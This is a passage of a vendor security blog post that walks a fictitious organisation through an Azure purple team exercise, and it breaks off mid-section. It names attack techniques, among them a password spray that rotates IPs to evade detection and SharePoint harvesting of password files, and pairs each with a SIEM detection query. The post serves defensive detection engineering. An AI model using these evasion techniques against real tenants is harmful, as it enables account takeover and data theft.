{"id":4583,"date":"2023-09-28T07:00:00","date_gmt":"2023-09-28T07:00:00","guid":{"rendered":"http:\/\/www.sumologic.com\/blog\/azure-cloud-purple-team"},"modified":"2026-03-23T11:11:28","modified_gmt":"2026-03-23T19:11:28","slug":"azure-cloud-purple-team","status":"publish","type":"blog","link":"https:\/\/www.sumologic.com\/blog\/azure-cloud-purple-team","title":{"rendered":"How to execute an Azure Cloud purple team exercise"},"content":{"rendered":"\n<section class=\"e-stn e-stn-0d652506f82b000a392973813b918ee25d5b4211 e-stn--glossary-inner-content e-stn--table-of-content\"><div class=\"container\">\n<div class=\"wp-block-b3rg-row e-row row\">\n<div class=\"wp-block-b3rg-column e-col e-col-1f7b3997080fc292474d26ff00c905d99d3520fa e-col--content-wrapper  col-sm-12 col-lg-12 col-xl-12\">\n<div class=\"e-div e-div-a1b32f66e1749758df41d5aea14f647cd10e362c e-div--card-btn-link\"><div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1400\" height=\"400\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Threat_Azure_blog_700x200.png\" alt=\"Threat_Azure_blog_700x200\" class=\"wp-image-4553\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-8eb94b7647adb4a91a0a6ddba7c6f9a2\">For folks who are responsible for threat detection of any kind for their organizations, the cloud can often be a difficult area to approach.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c1a34aeb721a04eb680479d853bc81c0\">At the time of writing, Amazon Web Services contains over two hundred services, while the Azure cloud offers six hundred.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-f227bcd5b5ae99f50cf4ebf3bf0c82b9\">Each of these services can generate unique <a href=\"https:\/\/www.sumologic.com\/glossary\/telemetry\/\" target=\"_blank\" rel=\"noopener\">telemetry<\/a> and each surface can present defenders with a unique attack path to handle. Adding to this complexity is the diversity of cloud workload configurations, as well as varying architecture models.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-d9a1a541e3874756e2169582c26bd7a1\">How do we, as protectors of the enterprise, begin to tackle visibility and threat detection use cases for these types of environments?&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c42e81a6491490354409c15c85a2a045\"><a href=\"https:\/\/www.sumologic.com\/blog\/threat-labs-kubernetes-home-lab\/\" target=\"_blank\" rel=\"noopener\">In previous blog posts<\/a>, we have outlined what purple teaming is and why it\u2019s a powerful tool to bring to bear in your enterprise. Now, let\u2019s continue this theme and cover how to apply the purple teaming concept to a Microsoft Entra\/Microsoft Azure environment which consists of compute, identity and productivity components.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-b5464c203c261a964f1947799fad8165\" id=\"why_purple_team_the_cloud?\">Why purple team the cloud?<\/h2>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-37d600ddd03c167a51d6fa13e10d3d1c\">As noted in the introduction to this post, the Azure cloud is associated with hundreds of services.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-9aa8afae4de7f74199a93892a7ba06c8\">Complicating this is the fact that the Azure cloud provides mechanisms for identity management via Microsoft Entra, compute options via Microsoft Azure, as well as various productivity services via Office 365.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-40fd1b352ee7a49caba558df156266ec\">Each of these three \u201cpillars\u201d has a unique set of telemetry and use cases tied to it, with various attack surfaces. In addition, from a threat actor point of view, the tradecraft necessary to meet objectives will no doubt differ depending on which component or service is being attacked or targeted.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-325e0f28fc803d99a9092cabc6bfdca5\">In this context, a purple team can be a valuable exercise that can be executed on an Azure cloud environment.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-f28f15761bc930dc93cdb7ca50bb8a70\">It is difficult to start from scratch in this regard, so let\u2019s briefly mind map the following broad areas of purple teaming in the context of the Azure cloud: planning, desired outcomes, areas of focus and finally, pitfalls. <strong><br><\/strong><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"838\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Why-purple-team-the-cloud.png\" alt=\"Why purple team the cloud\" class=\"wp-image-4554\" title=\"\"><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-3141a30ba8cc22027b189471b1d46d6e\" id=\"tactics,_techniques_and_procedures_selection\">Tactics, techniques and procedures selection<\/h2>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-189520edca137d3da833db9c24485ac7\">Let\u2019s apply this approach to a fictitious organization named FakeORG that utilizes the following Azure cloud services:<\/p>\n\n\n\n<ul>\n<li>Entra ID for identity management<\/li>\n<li>Office 365 for email and collaboration via Teams and SharePoint<\/li>\n<li>An Azure subscription that is running various virtual machines<\/li>\n<li>An Azure Kubernetes cluster for a containerized workload&nbsp;<\/li>\n<li>Azure DevOps for their development and release pipelines&nbsp;<\/li>\n<\/ul>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-57127f0240500c8c971fca1f22612fd8\">This organization believes they have the necessary telemetry for all the above services and workloads coming into their<a href=\"https:\/\/www.sumologic.com\/guides\/siem\" data-type=\"resource\" data-id=\"3026\"> SIEM<\/a> platform and want to purple team this environment in order to test their assumptions, discover gaps and create threat detection rules in order to wrangle malicious activity.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-37154f34d818bce4ddb856f315f53f0b\">After examining existing incidents and looking through a few threat intel reports, the team decides that the following techniques will be executed during the purple team exercise: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"617\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Tactics-techniques-and-procedures-selection.png\" alt=\"Tactics, techniques and procedures selection\" class=\"wp-image-4555\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c26f4f7159ffeaa5611437d06967bb6c\">These tactics, techniques and procedures cover identity, compute, containerized environments as well as developer paradigms and will provide a good starting point for future purple team efforts.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-d2be87968875cfbd80ff871abb215feb\">The participants of the purple team exercise have also agreed to keep notes on each of the executions, in the following format:&nbsp;<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u2013<\/td>\n<td>\u2013<\/td>\n<td>\u2013<\/td>\n<td>\u2013<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-e1e2e5dc9938f85ef2fa9533d9b0a03d\">The team has now chosen which techniques to replicate in the environment, has confirmed that the necessary access is in place and has also settled on a note-taking format.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-ac347b75e1151bf01a1ec8d8a190aa67\">Now the fun begins! The chosen tactics, techniques and procedures need to be executed within the environment while an eye is kept on the relevant telemetry on the other end.<\/p>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-40f794f89f29524f35dc518d8d9a801e\" id=\"purple_teaming_entra_id\">Purple teaming Entra ID<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-9c21aeff4e863d6aa2e69e0b29f29bee\" id=\"password_spray\">Password Spray<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-588f9898925423d55c40f3816378b189\">Password spraying is a critical area to wrap detective and preventive controls around, and FakeORG engineers have had to deal with a number of attacks on their environment that began with a password spray attempt.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5b9ab967a620df9e8db2f9d44293b475\">It makes sense then, that our FakeORG security engineers have decided to execute this technique during their purple team exercise.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-bf6db3130830451ed6e6789d3335e623\">In order to perform this password spray attack, they will be using the popular <a href=\"https:\/\/github.com\/knavesec\/CredMaster\" target=\"_blank\" rel=\"noopener\">CredMaster<\/a> tool.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-968f9190aa68cc77ce93e588c4160346\">The execution of this technique will look something like:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"928\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Password-Spray.png\" alt=\"Password Spray\" class=\"wp-image-4556\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-47ed1bd7c95cc5458a4a4c640cd5142d\">In typical password spray attacks, FakeORG engineers would be looking for failed authentication requests to multiple accounts coming from the same source IP address.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-03eeac4e4a8feb3d8155dee62e5497f7\">However, the CredMaster tool throws them a bit of a curve ball:&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2e5126be23e62bf92c09bc0774964242\"><em>\u201cLaunch a password spray \/ brute force attack via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. <\/em><strong><em>This dynamically creates FireProx APIs for more evasive password sprays.\u201d<\/em><\/strong><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-b30ee08db2ef815e62f2ba7d375d1488\">The key point here is that each authentication request has a new IP address associated with it, as a new AWS API Gateway is spun up dynamically.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-30c8c2610c11dd1a9bdbdbea83535d0d\">It is quickly discovered that existing password spray detections fail to capture this activity, as these detections rely on the failed authentication requests stemming from a single IP address.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-b435d9a876df85e311275918c8a77efd\">This is a great example of why purple teaming is an excellent tool for getting to the \u201cground truth\u201d of threat detection posture. The FakeORG engineers have at this point discovered a bit of a gap in their detection.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-13fd71149759e0823eadc4ec0345da7f\">The engineers brainstorm a little and discover that AWS provides a list of Gateway IP addresses, the engineers craft a cool one-liner to grab these IP addresses: <br><\/p>\n\n\n\n<pre>curl -s https:\/\/ip-ranges.amazonaws.com\/ip-ranges.json | jq '.prefixes[] | select(.service == \"API_GATEWAY\") | {ip_prefix} | join (\" \")'\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-4b0388bf79afb99b49b1ba6fa0301488\">Following the <a href=\"https:\/\/help.sumologic.com\/docs\/cse\/administration\/create-use-network-blocks\/#network-blocks-and-enrichment-fields\" target=\"_blank\" rel=\"noopener\">relevant Cloud SIEM documentation<\/a>, the engineers take the output of the above command and craft a CSV file with the following format:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1308\" height=\"622\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Cloud-SIEM-instance.jpg\" alt=\"Cloud SIEM instance\" class=\"wp-image-4557\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-eea2e381a34443605cfd12749b9d9515\">and proceed to upload it to their Cloud SIEM instance:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"472\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-Entra-ID.jpg\" alt=\"Purple teaming Entra ID\" class=\"wp-image-4558\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-e16bffca65a6592a37a9de07c2cc7c00\">Now, any record ingested into their Cloud SIEM instance that matches the IP range discovered above will be labeled with&nbsp; \u201cAWS_API_Gateway\u201d &#8211; the team can now utilize their logs and craft detections using the following logic:<\/p>\n\n\n\n<ul>\n<li>Look at only authentication failures<\/li>\n<li>Look at IP addresses with the \u201cAWS_API_Gateway\u201d label<\/li>\n<li>Timeslice the data by an appropriate amount of time<\/li>\n<li>Look for multiple authentication failures within the allotted time slice<\/li>\n<\/ul>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-51b9a12304c94e81dfafeb31bcead79e\">In query form, this would look like:<\/p>\n\n\n\n<pre>_index=sec_record_authentication\r\n| where device_ip_location = \"AWS_API_Gateway\"\r\n| where !success\r\n| timeslice 10m\r\n| count_distinct(device_ip) as ip_addresses,values(user_username) as usernames, values(srcDevice_ip) as source_ips,values(application) as applications by _timeslice\r\n| where ip_addresses &gt; 1\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5cd49dad2a59715e991428ff14e9d8aa\">And the results: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"368\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/AWS-API-Gateway.jpg\" alt=\"AWS API Gateway\" class=\"wp-image-4559\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-544a55c6c8ff2049d04d832edfe024d5\">During prototyping, it is noted that when timeslicing the data into 10 minute intervals, two authentication failures in each of those time blocks are observed stemming from the AWS API Gateway, which could be indicative of password spray attacks from tools that utilize the API Gateway for IP rotation purposes.<\/p>\n\n\n\n<h4>MFA device registration<\/h4>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2a68270b154afa330f9d0dc29227a3cb\">Moving on to the next test, the team at FakeORG have read many threat intelligence reports outlining attack flows whereby threat actors register a new multi-factor authentication device in Entra\/Azure AD.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-23299f1b408d9d053e866a216182cef5\">The test for this is relatively straightforward and it is decided to create a new temporary account, register an MFA device for the account and then browse to aka.ms\/mfasetup and register a new MFA device for this account.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-d902d9f069475a4768f267ecc4b4a67b\">In this instance, an alert every time an MFA method is changed is deemed unnecessary. However, it is decided that this execution should be discovered in the logs, as this would be a critical aspect to check if an account were to bubble up as compromised.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-690d2f4001674339d31072913b14a138\">The following query is crafted:<\/p>\n\n\n\n<pre>_index=sec_record_audit cloud_provider = \"Azure\" action = \"Update user\"\r\n| %\"fields.modified_property_strongauthenticationphoneappdetail\" as new_device\r\n| %\"fields.properties.targetresources.1.modifiedproperties.1.oldvalue\" as old_device\r\n| targetUser_username as username\r\n| where !isnull(new_device) \r\n| where !isnull(old_device)\r\n| json field=new_device \"DeviceName\" as new_device_name \r\n| json field=old_device \"[0].DeviceName\" as old_device_name \r\n| fields username,action,new_device_name,old_device_name\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-de94b1b1cae69bf2dc466ca75cce1a4b\">And the results are returned:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"793\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/MFA-device-registration.jpg\" alt=\"MFA device registration\" class=\"wp-image-4560\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-cecfc595013cd3b09020bcec392747e7\">In this case, the same MFA device was removed and added back in order to simulate the activity, but the underlying query logic works and this search is saved in order to be performed as part of broader incident response processes.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a043611653c440a1db6dd04804c85411\">For the Entra ID service, the notes are now:<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via Credmaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi-factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a48da9a41246289e0f22800a72fd44ce\">Very cool! The team can now start to see the purple team exercise taking shape and starting to deliver value, with three executions completed, a new detection being crafted and some searches created &#8211; the team keeps going and shifts gears a little bit towards Office 365<\/p>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-566dd193e9023b80f21efcbf93b6063c\" id=\"purple_teaming_office_365\">Purple teaming Office 365<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-ceb8836599d0720fef3d76dc4e62a7ea\" id=\"sharepoint_exfiltration\">SharePoint exfiltration<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-cf5a087fb6ef379afe349c7cbdafe1a6\">In this test, the team will attempt to determine if they can see when a user performs sensitive searches for documents found on SharePoint sites, and then proceeds to download these same sensitive documents. <br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-6f11b4cec6eaea5fd125fbd477ab281a\">For this test, the <a href=\"https:\/\/github.com\/nheiniger\/SnaffPoint\" target=\"_blank\" rel=\"noopener\">SnaffPoint<\/a> tool will be utilized.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-654b67cb309e4c321a8b377bc3663c07\">The tool is executed and sure enough, it finds a document containing the keyword search of \u201cpasswords\u201d &#8211; a test account is utilized in order to view and download the document. <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"780\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-Office-365.jpg\" alt=\"Purple teaming Office 365\" class=\"wp-image-4561\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-7ddcfbbd66b64ab10513a87cc090c24c\">The team starts to dig through the available SharePoint telemetry and sees various operations pertaining to this file, including the file being accessed as well as the search query being performed.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-9679819401d8d6ef8d7cbe6e8525658e\">In isolation, these events are interesting but do not paint a behavioral picture &#8211; something is needed to glue the events together in a logical fashion.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-b404ddf0b3ba8dcb6ed2dd787450d947\">After some tinkering, it is decided that a qualifier-type query would probably be the best approach &#8211; the query itself ends up looking like:&nbsp;<\/p>\n\n\n\n<div>\n<pre>_index=sec_record_audit resource=SharePoint\r\n\r\n\r\n| 0 as score\r\n| \"\" as messageQualifiers\r\n| \"\" as messageQualifiers1\r\n| \"\" as messageQualifiers2\r\n| \"\" as messageQualifiers3\r\n\r\n\r\n| timeslice 1h\r\n\r\n| %\"fields.SourceFileName\" as source_file_name\r\n\r\n| contains(file_basename,source_file_name) as file_searchdl_compare\r\n\r\n| if (%\"fields.searchquerytext\" matches \/(password)\/, concat(messageQualifiers, \"Sensitive SharePoint Search Performed: \",%\"fields.searchquerytext\", \"n# score: 300n\"),\"\") as messageQualifiers \r\n\r\n| if (action matches \/(FileAccessed)\/, concat(messageQualifiers1, \"SharePoint File Access: \",source_file_name, \"n# score: 300n\"),\"\") as messageQualifiers1\r\n\r\n| if (action matches \/(FileDownloaded)\/, concat(messageQualifiers2, \"SharePoint File Downloaded: \",file_basename, \"n# score: 300n\"),\"\") as messageQualifiers2\r\n\r\n| if(file_searchdl_compare, concat(messageQualifiers3, \"File Search and Access Match\",\"n# score: 300n\"),\"\") as messageQualifiers3\r\n\r\n| concat(messageQualifiers,messageQualifiers1,messageQualifiers2,messageQualifiers3) as q\r\n\r\n| parse regex field=q \"score:s(?&lt;score&gt;-?d+)\" multi \r\n\r\n| where !isEmpty(q) \r\n\r\n| values(q) as qualifiers,sum(score) as score by user_username,_timeslice\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a409eb6143c54436901dd8550fc1f7e3\">This query is:<\/p>\n\n\n\n<ul>\n<li>Timeslicing the data by an hour<\/li>\n<li>Looking at whether two fields from a FileAccessed and FileDownloaded event match &#8211; that is, we would like to know if a user searched for and then downloaded a file of the same name<\/li>\n<li>Looking for a FileAccessed and FileDownloaded event<\/li>\n<li>Assigning a score to each of the above qualifiers&nbsp;<\/li>\n<li>Summing the score based on the timeslice and user name performing the actions&nbsp;<\/li>\n<\/ul>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-be90c39ae6fedf5fd5837f6a0c8640f0\">The returned results are extremely interesting and look something like the following: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"882\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/SharePoint-exfiltration.jpg\" alt=\"SharePoint exfiltration\" class=\"wp-image-4562\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-fe5c5911d60acdd03fbfb4cd3edac3e7\">Here, we see two distinct results side by side, each broken down by the configured time slice, and the result on the left hand side has a score of 12,600 whereas the result on the right has a score of 18,600.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-af7b4091119c9db95553196a92f84d74\">The reason why the event on the right side is scoring higher is that it contains a qualifier for the user in question actually downloading the file that was queried and accessed. In other words, the execution chain on the left side tells you that someone may have performed a SharePoint query containing sensitive keywords and may have accessed a file containing sensitive keywords or information, but did not download this file.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a9e423fa747c2573316f320823b8165b\">The team now has various options for tweaking these qualifiers to suit their environment and can run this search on a schedule to bubble up an alert when the score exceeds a certain threshold.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-f811e6358ef9f296cda78ac4b059f4af\" id=\"teams_phishing\">Teams phishing<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a35da828cf5c48db54a535a9297becb3\">After looking at SharePoint, the team <a href=\"https:\/\/www.darkreading.com\/vulnerabilities-threats\/microsoft-teams-attack-phish-deliver-malware-directly\" target=\"_blank\" rel=\"noopener\">reads an article<\/a> that describes an attack flow whereby a misconfigured Teams tenant could potentially allow guest users to message users within an organization and send files that could be used for phishing attacks.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-81f3efc4b880cd71c0cd7bb7c32dc21e\">Current configurations are checked and it is discovered that currently, the organization is not affected by this misconfiguration, and the Teams tenant has external access disabled. However, since this setting can be modified, an alert that looks for this modification is desired.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-d725dd7364b2ef480348326ff97ced01\">The operation is performed in the tenant, and the logs are monitored.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c322b91ad13fc3340d62bb9d4a1f568d\">The following Cloud SIEM rule is crafted: <br><\/p>\n\n\n\n<pre>metadata_product = \"Office 365\"\r\nand action = \"TeamsAdminAction\"\r\nand lower(commandLine) matches \/(tenantfederationsettings\/configuration\/global)\/\r\nand fields[\"ModifiedProperties.1.Name\"] = \"AllowFederatedUsers\"\r\nand fields[\"ModifiedProperties.1.NewValue\"] = true\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-241189eee0bc25887bede02f1694200c\">Once the test is performed again, a relevant <a href=\"https:\/\/help.sumologic.com\/docs\/cse\/records-signals-entities-insights\/\" target=\"_blank\" rel=\"noopener\">Signal<\/a> is generated: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1513\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Teams-phishing.jpg\" alt=\"Teams phishing\" class=\"wp-image-4563\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-b9cf9576ea8f81f38ec714f418615eac\">Now when a Teams organizational setting to allow external guest access is enabled, a Signal is generated that can be actioned and investigated.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-4873e90f063084642f1153610f9b83cf\">Now the notes read:<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via Credmaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<tr>\n<td>SharePoint Exfiltration<\/td>\n<td>Create test SharePoint site, run SnaffPoint to search for a sensitive file and then download the file<\/td>\n<td>Office 365 logs, SharePoint operations<\/td>\n<td>Detection Crafted<\/td>\n<\/tr>\n<tr>\n<td>Teams External Access Enabled<\/td>\n<td>Browse to Office admin portal, enable external access to Teams<\/td>\n<td>Office 365, TeamsAdminAction<\/td>\n<td>No, CloudSIEM Signal created for enablement of external Teams guest access<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-a5009047cd4fb0c47beb4c23cb0b5527\" id=\"purple_teaming_azure_virtual_machines\">Purple teaming Azure Virtual Machines<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-86d5efb6e73b4b0a4e6f397caabae2b9\" id=\"vm_run_command\">VM run command<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-991b3fd85c6e6e2e7f4c60f91cbcdf7f\">Prior to performing the purple team exercise, the team came across <a href=\"https:\/\/www.mandiant.com\/resources\/blog\/azure-run-command-dummies\" target=\"_blank\" rel=\"noopener\">an awesome blog post<\/a> regarding Azure virtual machine run commands and wanted to see if their environment had the necessary telemetry in place to detect this activity.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5893b478f44383c4bb0d1c02ee7de545\">A test virtual machine is provisioned and a run command is issued to it. The command executes successfully, but no telemetry is visible related to this event.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color 